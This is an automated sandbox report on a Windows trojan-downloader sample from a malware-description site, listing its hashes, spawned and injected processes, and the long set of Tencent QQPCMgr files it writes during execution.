Trojan-Downloader.Win32.Moure_f533930028

by malwarelabrobot on May 20th, 2016 in Malware Descriptions.

Trojan-Downloader.Win32.Moure.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: f5339300281ab965a05a9ea2accd896c
SHA1: bce712a7db2139afcddcfdd1dbafee333c006f81
SHA256: fec7793a79f63b548e5f1ca4aeaba0bb094549fc1bcf515f9f3f2c9ab03473c9
SSDeep: 49152:GuuE7AnqIxGrGYyZa/tgrYJUGfZC3wA6EylfwEaFWd:IE7AqrlyutLxC3sEwwMd
Size: 2383432 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Sogou.com Inc.
Created at: 2016-04-18 16:10:46
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan-Downloader creates the following process(es):

QQPCMgr_Setup.exe:2796
QQBrowserLiveup.exe:1808
InstAsm.exe:3332
minidownload.exe:1832
MiniTPFw.exe:500
ThunderFW.exe:568
%original file name%.exe:856
QQBrowser.exe:1268
QQBrowser.exe:2328
QQBrowser.exe:2612
QQBrowser.exe:3756
QQBrowser.exe:3532
QQBrowser.exe:2196
QQBrowser.exe:3736
QQBrowser.exe:2944
QQBrowser.exe:3652
QQBrowser.exe:3128
QQBrowser.exe:1968
QQBrowser.exe:3472
QQBrowser.exe:3028
QQBrowser.exe:2888
QQBrowser.exe:1960
QQBrowser.exe:2364
QQBrowser.exe:2852
QQBrowser.exe:2764
QQBrowser.exe:3404
QQBrowser.exe:2836
QQBrowser.exe:2488
QQBrowser.exe:2492
QQBrowser.exe:3032
QQPCDownload8889533.exe:1584
j3lx7ew39.exe:2960
WiFi-2175.exe:664
BrowserProtect18.exe:2432
QQBrowserOTA.exe:2012
ExternalApp.exe:1112
QBDownload.exe:2504
regsvr32.exe:2300
regsvr32.exe:808
regsvr32.exe:3168
TsService.exe:3568
TsService.exe:3448
cacls.exe:3344
SuiteDownloader20160222153349.exe:1488
UpdateService.exe:628
UpdateService.exe:1880

The Trojan-Downloader injects its code into the following process(es):

SogouSoftware.exe:216
MiniThunderPlatform.exe:2060
QQBrowser.exe:3576
QQBrowser.exe:1252
QQBrowser.exe:3600
QQBrowser.exe:2624
QQBrowser.exe:4064
QQBrowser.exe:3504
QQPCTray.exe:3088
QQPCRealTimeSpeedup.exe:4488

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process QQPCMgr_Setup.exe:2796 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsNetHlp.sys (571 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAVProxy.dll (1349 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGuide.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\HomePageRecommendItems.xml (652 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMContextUninstall64.dll (1502 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_391.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\ProcessLogDll.dll (1818 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGuide.rdb (261 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\StartupMgr.dll (9881 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernelControl.dll (1750 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\PhoneMgrConfig.etf (322 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCClinicNetRepair\QQPCClinicNetRepair.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\GF.dll (22160 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\malware.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\AddMore.png (172 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMProviderUpdate.EXE (1876 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TavSignExcl.dat (22 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\7z.dll (8541 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCEntrancePlugin\QMSCEntrancePlugin.tpc (661 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMPToolTrayPlugin\QMPToolTrayPlugin.dll (2372 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1005.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\jgIOStub.dll (1674 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTencentNews.exe (4448 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQBrowserWebInstaller.exe (4308 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\smanalyplugin\SMAnalyPlugin.tpc (707 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\SupportDomain.xml (283 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMIESafeDll64.dll (1776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\msvcm80.dll (5237 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysmalwarejmp\malware.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMBJTrayPlugin\QMBJTrayPlugin.rdb (81 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TVL00003.tvl (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\HWPlugin.png (565 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1094.dat (443 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\sqlite.dll (6864 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\BNSConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\cpumark.etf (32 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMCheckNetwork.exe (1349 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUdisk.sys (981 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\arkGraphic.dll (4595 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMWebFWCtrl\QMWebFWCtrl.tpc (669 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMClinicTrayPlugin\QMClinicTrayPlugin.rdb (163 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1107.dat (456 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetSpeedTest\NetSpeedTest.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVInterface.dll (2643 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetflowOpti\QMNetflowOptiDll.dll (1033 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMDnsMonitor\QMDnsMonitor.dll (3065 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GFFtsysCustom.dll (2208 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\xGraphic32.dll (2232 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\DNSHookDomainList2.0.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGameAcceleratePlugin\QMGameAcceleratePlugin.dll (2414 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\macband.txt (35 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMLspPing.exe (591 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant\QMLOLAssistant\QMLOLAssistantShell.dll (8276 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\WebFireWallForRtp.dat (998 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDLP.exe (5997 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\IEStartPage(big).png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibforce.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCfixUI.dll (1916 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1026.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameUpgrade.dll (6063 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRouterLogic.dll (6649 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMNetMobileFlux.png (989 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHipsNotifyReport.dat (744 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMEtw.exe (1379 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMStateCheck.exe (1103 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1701.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\NMLib.dat (101 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1084.dat (453 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\FileSmash.png (314 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1098.dat (454 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\xGraphic32.dll (431 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_134.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1909.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftTrayTips.dat (720 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\NetMon.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibcssac.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1201.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysstartupmgrjmp\SysStartupMgrJmp.dll (553 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\tinyxml.dll (1019 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\TSVulFW.DAT (3786 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.tpc (665 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCClinicNet\QQPCClinicNet.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysCleanPage\syscleanpage.tpc (798 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCXPNOTIFY.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp.sys (34 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QQPCMgrUpdate.exe (5466 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\ProblemInfo.xml (199 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMMalCore.dll (7389 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftVerInfo.etf (34 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysstartupmgrjmp\StartupMgr.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMShield128.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\msvcr80.dll (6481 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\PCSoftMgrToolsDll.dll (1944 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\zlib.dll (356 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\AppLaunch.48.prf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1346.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_889.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTrojanPlugin\QMTrojanPlugin.tpc (690 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\zlib.dll (784 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\tinyxml.dll (1903 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\AntiRK.sys (362 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\CheckAv.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAppPluginInfo.xml (969 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSysRepLib.dat (6413 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\PackageUpdate.dat (3821 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\startupmgr.tpc (879 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1411.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCFileOpen.exe (6787 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTrayDetector\QMTrayDetector.dll (1760 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCClinic.dat (720 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_298.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMClinicsettingcenter\QMClinicSettingCenter.rdb (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\tinyxml.dll (1295 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\MemDefrag.dll (838 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCXPNOTIFY.exe (4877 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHungDll.dll (4805 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QmTtInterface.dll (4071 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSkinMgr.dll (5097 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMLoader\QQPCDetector.dll (7694 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftAnalyzePolicy.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1022.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmsoftplugin\QMSoftPlugin.dll (3423 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMForbiddenWinKey.dll (386 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysSpeedUp\SysSpeedUp.dll (2775 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr00.def (21 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\libpng.dll (2859 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\DownloaderMgrScript.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\MalWare.dll (4492 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\sm10.dat (10 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr.dll (6358 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\QMAutoTaskPlugin.tpc (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1224.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\wifigx.png (800 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftConfig.dat (720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\setup.xml (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMArpHelperDll.dll (1777 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1879.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1083.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp5.inf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\GameLogo\defaultlogo.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\QQPCCommonMgr.rdb (13284 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SuperSpeedup.rdb (152 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1009.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\DownloaderManager.dll (8518 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCB1AndroidJmp.png (1 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine_Cache\QMQuarantine.exe (3878 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_715.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMClinicTrayPlugin\QMClinicTrayPlugin.dll (7183 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant\QMLOLAssistant\QMLOLAssistantCore.dll (3828 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMPerfCtrl\QMPerfCtrl.dll (4167 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\PackageConf.dll (3287 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_120.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\MFConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRealTimeSpeedupSkinCenter.zip (111 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSDefenseBt.sys (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\GameSpeedupExposure\GameExposureCfg.xml (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameFilter.etf (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\qqpcupgradejump.png (503 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\QMHardwareDetectPlugin.tpc (716 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\Check_Router.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\8.0.50727.4053.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_2015.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMVulPlugin\QMVulPlugin.tpc (671 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMHwFloatWnd\QMHwFloatWnd.dll (3200 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QQPCSoftMgr_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\libpng.dll (598 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\hptrojanscan\HPTrojanScan.dll (5077 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1407.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QQPCUpdate.exe (3361 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRecommenderRes.dat (96 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\hpiestartpagescan\HPIEStartPageScan.dll (2092 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\jgImage.dll (90 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileMon\i386\TFsFlt.sys (2964 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp6_64.sys (964 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QOLogo\DefaultMgr.png (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\npQMExtensionsIE.dll (1455 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCStub.exe (1261 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SuperKillModules.dll (1331 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMEmMat.dll (1755 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGuide.exe (2626 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMTrojanScan\QMTrojanScan.rdb (6313 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCClinicNetRepair.png (436 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\TPSConfig.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMNewsTips\QMNewsTips.tpc (727 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1602.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_130.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsDefenseBT64.sys (1701 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\arkGraphic.dll (4164 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1024.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenInfo.xml (202 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\AdfilterExtension.crx (213 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\msvcr80.dll (7024 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SuperSpeedup.exe (6063 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGameUpgradePlugin\QMGameUpgradePlugin.rdb (137 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virpe01.def (1723 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\AppLaunch.1.prf (15 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp5_m.inf (940 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\Deopt.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1225.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMMobileSettingCenter\QMMobileSettingCenter.rdb (61 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\AppLaunch.64.prf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\RICHED20.DLL (8670 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCmgrInstallGuide.exe (3236 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\qqpcweiyundiskjmp.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1025.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSccTrayPlugin\QMSccTrayPlugin.rdb (46 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\qmcloudinter\QMHipsProcessDecouple.dat (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\communic.dll (1075 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftTrayTips.ini (17 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_668.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\AntiRKX64.sys (1674 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SuperSpeedup.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysOptimize\SysOptimize.dll (1604 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\tinyxml.dll (2423 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMShield48.png (890 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\QQPCDetector\dlcore.dll (21288 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\arkGraphic.dll (1826 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\sm02.dat (17 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMPTool.exe (2103 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1220.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDeskTopGC.rdb (3562 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\extract.dll (2105 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\SoftMove.png (622 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\TraceClear\traceclear.tpc (687 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\CubeSwitch.etf (935 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQSysMonX64.sys (744 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsmsc.DAT (580 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMobileFlux\QMNetMobileFluxDll.dll (796 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHwNetwork.dll (571 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\dr.dll (1718 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDLP.rdb (32 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmspeedupplugin\speeduprocket\SpeedupRocket.dll (9622 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SysSpeedUpDll.dll (1137 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsmscj.DAT (500 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\qqpclaunch.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_141.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1032.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCExternal.exe (1788 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTraceClearDll.dll (7045 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\TraceClear\QMTraceClear.PNG (2 bytes)
